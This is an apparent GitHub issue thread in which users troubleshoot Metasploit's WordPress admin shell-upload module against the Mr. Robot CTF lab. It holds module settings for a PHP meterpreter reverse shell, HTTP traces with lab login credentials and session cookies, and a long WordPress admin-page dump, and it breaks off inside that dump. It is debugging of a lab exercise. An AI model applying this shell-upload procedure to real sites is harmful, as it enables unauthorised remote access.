exploit/unix/webapp/wp_admin_shell_upload: The target does not appear to be using WordPress

Darkcast commented 6 years ago

I am running the Mr.Robot CTF and when I try to use the wp_admin_shell_upload.rb the module says that the site is not running wp.

PS. the ctf is running on a VMware

Steps to reproduce

use metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb set requested data (see below)

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   [redacted]        yes       The WordPress password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.0.16         yes       The target address
   RPORT      80                         yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  wp-login.php     yes       The base path to the wordpress application
   USERNAME   [redacted]                 yes       The WordPress username to authenticate with
   VHOST                                   no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.17     yes       The listen address (an interface may be specified)
   LPORT  4444                  yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

Expected behavior

What should happen? create a shell

Current behavior

msf exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.0.17:4444 
**[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**
**[*] Exploit completed, but no session was created.**
msf exploit(unix/webapp/wp_admin_shell_upload) >

What happens instead? it says the target is not using wp You might also want to check the last ~1k lines of /opt/metasploit/apps/pro/engine/config/logs/framework.log or ~/.msf4/logs/framework.log for relevant stack traces

System stuff

Metasploit version

msf exploit(unix/webapp/wp_admin_shell_upload) > version Framework: 4.17.18-dev Console : 4.17.18-dev

I installed Metasploit with:

[X] Kali package via apt

OS

What OS are you running Metasploit on?

KALI BABY WOOOOO

Linux kali 4.18.0-kali1-amd64 #1 SMP Debian 4.18.6-1kali1 (2018-09-10) x86_64 GNU/Linux

bcoles commented 6 years ago

You can disable the WordPress check with: set WPCHECK false

msf5 exploit(unix/webapp/wp_admin_shell_upload) > show advanced options

Module advanced options (exploit/unix/webapp/wp_admin_shell_upload):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for windows authentification
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, TLS1, TLS1.2, TLS1.1, SSL3, SSL23)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WPCHECK                 true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                          yes       The name of the wp-content directory
   WfsDelay                0                                                   no        Additional delay when waiting for a session

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf5 exploit(unix/webapp/wp_admin_shell_upload) >

wvu commented 6 years ago

Your TARGETURI of wp-login.php is incorrect. It should be / or other. The filename is added by the API.

And please don't post spoilers.

Gakovski commented 3 years ago

I have similar problem, I had this problem but now I have another one.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Authenticating with WordPress using admin:password123...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

(username and password are correct)

h00die commented 3 years ago

@Gakovski can you re-run with show httptrace true, that will better help with diagnosing. What version of metasploit, and wordpress are being used?

Gakovski commented 3 years ago

@h00die here's the output with httptrace enabled

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Authenticating with WordPress using admin:password123...
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 192.168.73.78                                                                                                                                                                                                                          
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                                                                                                                                                                               
Content-Type: application/x-www-form-urlencoded                                                                                                                                                                                              
Content-Length: 63                                                                                                                                                                                                                           

log=admin&pwd=password123&redirect_to=/cqQAXBGJ&wp-submit=Login                                                                                                                                                                              
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Thu, 20 May 2021 14:49:11 GMT                                                                                                                                                                                                          
Server: Apache/2.4.25 (Debian)                                                                                                                                                                                                               
Content-Length: 362                                                                                                                                                                                                                          
Connection: close                                                                                                                                                                                                                            
Content-Type: text/html; charset=iso-8859-1                                                                                                                                                                                                  

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                                                                                                                                                                           
<html><head>                                                                                                                                                                                                                                 
<title>400 Bad Request</title>                                                                                                                                                                                                               
</head><body>                                                                                                                                                                                                                                
<h1>Bad Request</h1>                                                                                                                                                                                                                         
<p>Your browser sent a request that this server could not understand.<br />                                                                                                                                                                  
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />                                                                                                                                                                      
 Instead use the HTTPS scheme to access this URL, please.<br />                                                                                                                                                                              
</p>                                                                                                                                                                                                                                         
</body></html>                                                                                                                                                                                                                               

[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

Metasploit version: metasploit v6.0.43-dev Wordpress version: 3.7.2

It seems that the whole wordpress is read only and that's why I can't upload the payload.

Here's more information If is use set ssl true, re-run the exploit, this is the output.


</head>                                                                                                                                                                                                                                      
<body id="error-page">                                                                                                                                                                                                                       
        <p>Unable to create directory wp-content/uploads/2021/05. Is its parent directory writable by the server?</p></body>                                                                                                                 
</html>                                                                                                                                                                                                                                      

[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

h00die commented 3 years ago

Correct, you need set ssl true, and after that it looks like the server is configured to not allow creation of directories. This doesn't seem to be a metasploit issue, but a server configuration issue

dikshitkhandelwal commented 3 years ago

I am having the same problem! I tried to exploit after setting SSL to true, and as thrown with a different error. The username and password are correct. I have not shown here `

msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.0.61:4444 
[*] Authenticating with WordPress using USERNAME:PASSWORD..
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 10.10.95.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

log=elliot&pwd=ER28-0652&redirect_to=/nNCJdonU&wp-submit=Login
SSL_connect returned=1 errno=0 state=error: wrong version number
[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number
[*] Exploit completed, but no session was created.

`

Metasploit version: metasploit v6.0.48-dev

navaneeth-dev commented 3 years ago

Correct, you need set ssl true, and after that it looks like the server is configured to not allow creation of directories. This doesn't seem to be a metasploit issue, but a server configuration issue

Sorry to open an old issue but how would one allow the creation of directories from wordpress admin itself?

Current Output for Mr.robot ctf:

[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
####################
# Request:
####################
GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1
Host: 10.10.45.132
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_logged_in_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7C0474feaa2e15ec02391bccad8e07d91a5f7c822278c0e3d39be90f65751b9f9f;

####################
# Response:
####################
HTTP/1.1 200 OK
Date: Sun, 08 Aug 2021 05:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.5.29
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Set-Cookie: wp-settings-6=libraryContent%3Dbrowse; expires=Mon, 08-Aug-2022 05:12:57 GMT; Max-Age=31536000; path=/, wp-settings-time-6=1628399577; expires=Mon, 08-Aug-2022 05:12:57 GMT; Max-Age=31536000; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8 wp-toolbar"  lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" class="wp-toolbar"  lang="en-US">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Add Plugins &lsaquo; user&#039;s Blog! &#8212; WordPress</title>
<script type="text/javascript">
addLoadEvent = function(func){if(typeof jQuery!="undefined")jQuery(document).ready(func);else if(typeof wpOnload!='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
var ajaxurl = '/wp-admin/admin-ajax.php',
    pagenow = 'plugin-install',
    typenow = '',
    adminpage = 'plugin-install-php',
    thousandsSeparator = ',',
    decimalPoint = '.',
    isRtl = 0;
</script>
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
<link rel='stylesheet' href='http://10.10.45.132/wp-admin/load-styles.php?c=0&amp;dir=ltr&amp;load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&amp;ver=4.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='open-sans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&#038;subset=latin%2Clatin-ext&#038;ver=4.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://10.10.45.132/wp-includes/js/thickbox/thickbox.css?ver=4.3.1' type='text/css' media='all' />
<!--[if lte IE 7]>
<link rel='stylesheet' id='ie-css'  href='http://10.10.45.132/wp-admin/css/ie.min.css?ver=4.3.1' type='text/css' media='all' />
<![endif]-->
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"http:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/10.10.45.132\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1"}};
            !function(a,b,c){function d(a){var c=b.createElement("canvas"),d=c.getContext&&c.getContext("2d");return d&&d.fillText?(d.textBaseline="top",d.font="600 32px Arial","flag"===a?(d.fillText(String.fromCharCode(55356,56812,55356,56807),0,0),c.toDataURL().length>3e3):(d.fillText(String.fromCharCode(55357,56835),0,0),0!==d.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
        </script>

<script type='text/javascript'>
/* <![CDATA[ */
var userSettings = {"url":"\/","uid":"6","time":"1628399569","secure":""};var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};var _wpUpdatesSettings = {"ajax_nonce":"457cc65d82","l10n":{"updating":"Updating...","updated":"Updated!","updateFailed":"Update Failed: %s","updatingLabel":"Updating %s...","updatedLabel":"%s updated!","updateFailedLabel":"%s update failed","updatingMsg":"Updating... please wait.","updatedMsg":"Update completed successfully.","updateCancel":"Update canceled.","beforeunload":"Plugin updates may not complete if you navigate away from this page."}};/* ]]> */
</script>
<script type='text/javascript' src='http://10.10.45.132/wp-admin/load-scripts.php?c=0&amp;load%5B%5D=jquery-core,jquery-migrate,utils,underscore,wp-util,wp-a11y,updates&amp;ver=4.3.1'></script>
    <link id="wp-admin-canonical" rel="canonical" href="http://10.10.45.132/wp-admin/plugin-install.php?tab=upload" />
    <script>
        if ( window.history.replaceState ) {
            window.history.replaceState( null, null, document.getElementById( 'wp-admin-canonical' ).href + window.location.hash );
        }
    </script>
<script type="text/javascript">var _wpColorScheme = {"icons":{"base":"#999","focus":"#00a0d2","current":"#fff"}};</script>
<style type="text/css" media="print">#wpadminbar { display:none; }</style>
</head>
<body class="wp-admin wp-core-ui no-js  plugin-install-php auto-fold admin-bar branch-4-3 version-4-3-1 admin-color-fresh locale-en-us no-customize-support no-svg">
<script type="text/javascript">
    document.body.className = document.body.className.replace('no-js','js');
</script>

    <script type="text/javascript">
        (function() {
            var request, b = document.body, c = 'className', cs = 'customize-support', rcs = new RegExp('(^|\\s+)(no-)?'+cs+'(\\s+|$)');

            request = true;

            b[c] = b[c].replace( rcs, ' ' );
            b[c] += ( window.postMessage && request ? ' ' : ' no-' ) + cs;
        }());
    </script>

<div id="wpwrap">

<div id="adminmenumain" role="navigation" aria-label="Main menu">
<a href="#wpbody-content" class="screen-reader-shortcut">Skip to main content</a>
<a href="#wp-toolbar" class="screen-reader-shortcut">Skip to toolbar</a>
<div id="adminmenuback"></div>
<div id="adminmenuwrap">
<ul id="adminmenu">

    <li class="wp-first-item wp-has-submenu wp-not-current-submenu menu-top menu-top-first menu-icon-dashboard menu-top-last" id="menu-dashboard">
    <a href='index.php' class="wp-first-item wp-has-submenu wp-not-current-submenu menu-top menu-top-first menu-icon-dashboard menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-dashboard'><br /></div><div class='wp-menu-name'>Dashboard</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Dashboard</li><li class="wp-first-item"><a href='index.php' class="wp-first-item">Home</a></li><li><a href='update-core.php'>Updates <span class='update-plugins count-0' title=''><span class='update-count'>0</span></span></a></li></ul></li>
    <li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
    <li class="wp-has-submenu wp-not-current-submenu open-if-no-js menu-top menu-icon-post menu-top-first" id="menu-posts">
    <a href='edit.php' class="wp-has-submenu wp-not-current-submenu open-if-no-js menu-top menu-icon-post menu-top-first" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-post'><br /></div><div class='wp-menu-name'>Posts</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Posts</li><li class="wp-first-item"><a href='edit.php' class="wp-first-item">All Posts</a></li><li><a href='post-new.php'>Add New</a></li><li><a href='edit-tags.php?taxonomy=category'>Categories</a></li><li><a href='edit-tags.php?taxonomy=post_tag'>Tags</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-media" id="menu-media">
    <a href='upload.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-media" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-media'><br /></div><div class='wp-menu-name'>Media</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Media</li><li class="wp-first-item"><a href='upload.php' class="wp-first-item">Library</a></li><li><a href='media-new.php'>Add New</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-page" id="menu-pages">
    <a href='edit.php?post_type=page' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-page" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-page'><br /></div><div class='wp-menu-name'>Pages</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Pages</li><li class="wp-first-item"><a href='edit.php?post_type=page' class="wp-first-item">All Pages</a></li><li><a href='post-new.php?post_type=page'>Add New</a></li></ul></li>
    <li class="wp-not-current-submenu menu-top menu-icon-comments menu-top-last" id="menu-comments">
    <a href='edit-comments.php' class="wp-not-current-submenu menu-top menu-icon-comments menu-top-last" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-comments'><br /></div><div class='wp-menu-name'>Comments <span class='awaiting-mod count-0'><span class='pending-count'>0</span></span></div></a></li>
    <li class="wp-not-current-submenu wp-menu-separator" aria-hidden="true"><div class="separator"></div></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-appearance menu-top-first" id="menu-appearance">
    <a href='themes.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-appearance menu-top-first" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-appearance'><br /></div><div class='wp-menu-name'>Appearance</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Appearance</li><li class="wp-first-item"><a href='themes.php' class="wp-first-item">Themes</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Fplugin-install.php%3Ftab%3Dupload' class="hide-if-no-customize">Customize</a></li><li><a href='widgets.php'>Widgets</a></li><li><a href='nav-menus.php'>Menus</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Fplugin-install.php%3Ftab%3Dupload&#038;autofocus%5Bcontrol%5D=header_image' class="hide-if-no-customize">Header</a></li><li class="hide-if-no-customize"><a href='customize.php?return=%2Fwp-admin%2Fplugin-install.php%3Ftab%3Dupload&#038;autofocus%5Bcontrol%5D=background_image' class="hide-if-no-customize">Background</a></li><li><a href='themes.php?page=custom-header'>Header</a></li><li><a href='themes.php?page=custom-background'>Background</a></li><li><a href='theme-editor.php'>Editor</a></li></ul></li>
    <li class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top menu-icon-plugins" id="menu-plugins">
    <a href='plugins.php' class="wp-has-submenu wp-has-current-submenu wp-menu-open menu-top menu-icon-plugins" ><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-plugins'><br /></div><div class='wp-menu-name'>Plugins <span class='update-plugins count-0'><span class='plugin-count'>0</span></span></div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Plugins <span class='update-plugins count-0'><span class='plugin-count'>0</span></span></li><li class="wp-first-item"><a href='plugins.php' class="wp-first-item">Installed Plugins</a></li><li class="current"><a href='plugin-install.php' class="current">Add New</a></li><li><a href='plugin-editor.php'>Editor</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-users" id="menu-users">
    <a href='users.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-users" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-users'><br /></div><div class='wp-menu-name'>Users</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Users</li><li class="wp-first-item"><a href='users.php' class="wp-first-item">All Users</a></li><li><a href='user-new.php'>Add New</a></li><li><a href='profile.php'>Your Profile</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-tools" id="menu-tools">
    <a href='tools.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-tools" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-tools'><br /></div><div class='wp-menu-name'>Tools</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Tools</li><li class="wp-first-item"><a href='tools.php' class="wp-first-item">Available Tools</a></li><li><a href='import.php'>Import</a></li><li><a href='export.php'>Export</a></li></ul></li>
    <li class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-settings menu-top-last" id="menu-settings">
    <a href='options-general.php' class="wp-has-submenu wp-not-current-submenu menu-top menu-icon-settings menu-top-last" aria-haspopup="true"><div class="wp-menu-arrow"><div></div></div><div class='wp-menu-image dashicons-before dashicons-admin-settings'><br /></div><div class='wp-menu-name'>Settings</div></a>
    <ul class='wp-submenu wp-submenu-wrap'><li class='wp-submenu-head' aria-hidden='true'>Settings</li><li class="wp-first-item"><a href='options-general.php' class="wp-first-item">General</a></li><li><a href='options-writing.php'>Writing</a></li><li><a href='options-reading.php'>Reading</a></li><li><a href='options-discussion.php'>Discussion</a></li><li><a href='options-media.php'>Media</a></li><li><a href='options-permalink.php'>Permalinks</a></li></ul></li><li id="collapse-menu" class="hide-if-no-js"><div id="collapse-button"><div></div></div><span>Collapse menu</span></li></ul>
</div>
</div>
<div id="wpcontent">

        <div id="wpadminbar" class="nojq nojs">
                        <div class="quicklinks" id="wp-toolbar" role="navigation" aria-label="Toolbar" tabindex="0">
                <ul id="wp-admin-bar-root-default" class="ab-top-menu">
        <li id="wp-admin-bar-menu-toggle"><a class="ab-item"  href="#"><span class="ab-icon"></span><span class="screen-reader-text">Menu</span></a>        </li>
        <li id="wp-admin-bar-wp-logo" class="menupop"><a class="ab-item"  aria-haspopup="true" href="http://10.10.45.132/wp-admin/about.php"><span class="ab-icon"></span><span class="screen-reader-text">About WordPress</span></a><div class="ab-sub-wrapper"><ul id="wp-admin-bar-wp-logo-default" class="ab-submenu">
        <li id="wp-admin-bar-about"><a class="ab-item"  href="http://10.10.45.132/wp-admin/about.php">About WordPress</a>       </li></ul><ul id="wp-admin-bar-wp-logo-external" class="ab-sub-secondary ab-submenu">
        <li id="wp-admin-bar-wporg"><a class="ab-item"  href="https://wordpress.org/">WordPress.org</a>     </li>
        <li id="wp-admin-bar-documentation"><a class="ab-item"  href="https://codex.wordpress.org/">Documentation</a>       </li>
        <li id="wp-admin-bar-support-forums"><a class="ab-item"  href="https://wordpress.org/support/">Support Forums</a>       </li>
        <li id="wp-admin-bar-feedback"><a class="ab-item"  href="https://wordpress.org/support/forum/requests-and-feedback">Feedback</a>        </li></ul></div>        </li>
        <li id="wp-admin-bar-site-name" class="menupop"><a class="ab-item"  aria-haspopup="true" href="http://10.10.45.132/">user&#039;s Blog!</a><div class="ab-sub-wrapper"><ul id="wp-admin-bar-site-name-default" class="ab-submenu">
        <li id="wp-admin-bar-view-site"><a class="ab-item"  href="http://10.10.45.132/">Visit Site</a>      </li></ul></div>        </li>
        <li id="wp-admin-bar-comments"><a class="ab-item"  href="http://10.10.45.132/wp-admin/edit-comments.php" title="0 comments awaiting moderation"><span class="ab-icon"></span><span id="ab-awaiting-mod" class="ab-label awaiting-mod pending-count count-0">0</span></a>        </li>
        <li id="wp-admin-bar-new-content" class="menupop"><a class="ab-item"  aria-haspopup="true" href="http://10.10.45.132/wp-admin/post-new.php"><span class="ab-icon"></span><span class="ab-label">New</span></a><div class="ab-sub-wrapper"><ul id="wp-admin-bar-new-content-default" class="ab-submenu">
        <li id="wp-admin-bar-new-post"><a class="ab-item"  href="http://10.10.45.132/wp-admin/post-new.php">Post</a>        </li>
        <li id="wp-admin-bar-new-media"><a class="ab-item"  href="http://10.10.45.132/wp-admin/media-new.php">Media</a>     </li>
        <li id="wp-admin-bar-new-page"><a class="ab-item"  href="http://10.10.45.132/wp-admin/post-new.php?post_type=page">Page</a>     </li>
        <li id="wp-admin-bar-new-user"><a class="ab-item"  href="http://10.10.45.132/wp-admin/user-new.php">User</a>        </li></ul></div>        </li></ul><ul id="wp-admin-bar-top-secondary" class="ab-top-secondary ab-top-menu">
        <li id="wp-admin-bar-my-account" class="menupop with-avatar"><a class="ab-item"  aria-haspopup="true" href="http://10.10.45.132/wp-admin/profile.php">Howdy, Elliot Alderson<img alt='' src='http://2.gravatar.com/avatar/5bfa1c5c7828c0c6c957d7827e4ba8ee?s=26&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/5bfa1c5c7828c0c6c957d7827e4ba8ee?s=52&amp;d=mm&amp;r=g 2x' class='avatar avatar-26 photo' height='26' width='26' /></a><div class="ab-sub-wrapper"><ul id="wp-admin-bar-user-actions" class="ab-submenu">
        <li id="wp-admin-bar-user-info"><a class="ab-item" tabindex="-1" href="http://10.10.45.132/wp-admin/profile.php"><img alt='' src='http://2.gravatar.com/avatar/5bfa1c5c7828c0c6c957d7827e4ba8ee?s=64&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/5bfa1c5c7828c0c6c957d7827e4ba8ee?s=128&amp;d=mm&amp;r=g 2x' class='avatar avatar-64 photo' height='64' width='64' /><span class='display-name'>Elliot Alderson</span><span class='username'>elliot</span></a>     </li>
        <li id="wp-admin-bar-edit-profile"><a class="ab-item"  href="http://10.10.45.132/wp-admin/profile.php">Edit My Profile</a>      </li>
        <li id="wp-admin-bar-logout"><a class="ab-item"  href="http://10.10.45.132/wp-login.php?action=logout&#038;_wpnonce=397dff59ef">Log Out</a>     </li></ul></div>    </li></ul>          </div>
                        <a class="screen-reader-shortcut" href="http://10.10.45.132/wp-login.php?action=logout&#038;_wpnonce=397dff59ef">Log Out</a>
                    </div>

<div id="wpbody" role="main">

<div id="wpbody-content" aria-label="Main content" tabindex="0">
        <div id="screen-meta" class="metabox-prefs">

            <div id="contextual-help-wrap" class="hidden" tabindex="-1" aria-label="Contextual Help Tab">
                <div id="contextual-help-back"></div>
                <div id="contextual-help-columns">
                    <div class="contextual-help-tabs">
                        <ul>

                            <li id="tab-link-overview" class="active">
                                <a href="#tab-panel-overview" aria-controls="tab-panel-overview">
                                    Overview                                </a>
                            </li>

                            <li id="tab-link-adding-plugins">
                                <a href="#tab-panel-adding-plugins" aria-controls="tab-panel-adding-plugins">
                                    Adding Plugins                              </a>
                            </li>
                                                </ul>
                    </div>

                                        <div class="contextual-help-sidebar">
                        <p><strong>For more information:</strong></p><p><a href="https://codex.wordpress.org/Plugins_Add_New_Screen" target="_blank">Documentation on Installing Plugins</a></p><p><a href="https://wordpress.org/support/" target="_blank">Support Forums</a></p>                  </div>

                    <div class="contextual-help-tabs-wrap">

                            <div id="tab-panel-overview" class="help-tab-content active">
                                <p>Plugins hook into WordPress to extend its functionality with custom features. Plugins are developed independently from the core WordPress application by thousands of developers all over the world. All plugins in the official <a href="https://wordpress.org/plugins/" target="_blank">WordPress.org Plugin Directory</a> are compatible with the license WordPress uses. You can find new plugins to install by searching or browsing the Directory right here in your own Plugins section.</p>          </div>

                            <div id="tab-panel-adding-plugins" class="help-tab-content">
                                <p>If you know what you&#8217;re looking for, Search is your best bet. The Search screen has options to search the WordPress.org Plugin Directory for a particular Term, Author, or Tag. You can also search the directory by selecting popular tags. Tags in larger type mean more plugins have been labeled with that tag.</p><p>If you just want to get an idea of what&#8217;s available, you can browse Featured and Popular plugins by using the links in the upper left of the screen. These sections rotate regularly.</p><p>You can also browse a user&#8217;s favorite plugins, by using the Favorites link in the upper left of the screen and entering their WordPress.org username.</p><p>If you want to install a plugin that you&#8217;ve downloaded elsewhere, click the Upload link in the upper left. You will be prompted to upload the .zip package, and once uploaded, you can activate the new plugin.</p>                            </div>
                                            </div>
                </div>
            </div>
                </div>
                <div id="screen-meta-links">
                    <div id="contextual-help-link-wrap" class="hide-if-no-js screen-meta-toggle">
            <button type="button" id="contextual-help-link" class="button show-settings" aria-controls="contextual-help-wrap" aria-expanded="false">Help</button>
            </div>
                </div>
        <div class="wrap">
<h1>
    Add Plugins <a href="http://10.10.45.132/wp-admin/plugin-install.php" class="upload page-title-action">Browse</a></h1>

<div class="upload-plugin">
    <p class="install-help">If you have a plugin in a .zip format, you may install it by uploading it here.</p>
    <form method="post" enctype="multipart/form-data" class="wp-upload-form" action="http://10.10.45.132/wp-admin/update.php?action=upload-plugin">
